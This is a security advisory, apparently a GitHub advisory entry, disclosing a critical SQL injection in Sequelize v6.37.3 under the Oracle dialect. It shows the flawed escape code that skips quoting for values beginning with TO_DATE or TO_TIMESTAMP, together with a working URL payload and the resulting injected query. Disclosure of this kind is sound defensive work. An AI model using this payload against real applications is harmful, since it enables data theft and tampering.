SQL Injection is possible with strings only if dialect is set to oracle.
The vulnerability was confirmed on Sequelize v6.37.3.
The escape function defined in sql-string.js does not escape quotes if the value starts with TO_TIMESTAMP or TO_DATE.
} else if (dialect === 'oracle' && typeof val === 'string') {
if (val.startsWith('TO_TIMESTAMP') || val.startsWith('TO_DATE')) {
return val;
}
val = val.replace(/'/g, "''");
}
Suppose the application has the following code:
var result = await models.Student.findOne({
where: {
firstName: req.query.firstName
}
});
An attacker can inject arbitrary sql expressions.
http://host/path?firstName=TO_DATE('0','Y')||'' OR 1=1--
The resulted SQL will be:
SELECT ... WHERE "Student"."firstName" = TO_DATE('0','Y')||'' OR 1=1-- ORDER BY "Student"."id" OFFSET 0 ROWS FETCH NEXT 1 ROWS ONLY;
Data theft and tampering.
{
"cwe_ids": [
"CWE-89"
],
"github_reviewed": true,
"github_reviewed_at": "2026-08-03T20:29:50Z",
"nvd_published_at": null,
"severity": "CRITICAL"
}